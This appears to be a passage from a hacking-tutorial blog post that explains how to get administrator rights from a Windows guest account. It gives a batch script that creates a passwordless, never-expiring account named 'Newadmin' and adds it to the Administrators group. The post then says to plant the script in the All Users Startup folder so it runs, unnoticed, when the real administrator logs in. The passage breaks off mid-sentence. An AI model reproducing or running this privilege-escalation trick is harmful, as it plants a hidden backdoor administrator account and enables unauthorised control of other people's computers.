Hello Friend's, I am back How to create an Admin account From a Guest Account intresting right..? Creating an administrator account from guest account is very easy and simple. You just need to use your guest account and create one administrator account instantly. 1) . Open Notepad, paste the following : @echo off net user Newadmin /add /expires:never /passwordreq:no net localgroup “Administrators” /add Newadmin 2) . Save it as a .bat file. 3) . Now place this bat file in location local:\Documents and Settings\All Users\Start Menu\Programs\Startup Now when your admin logs into the system, the new account will be automatically created without knowing the admin .Now next time when you will log...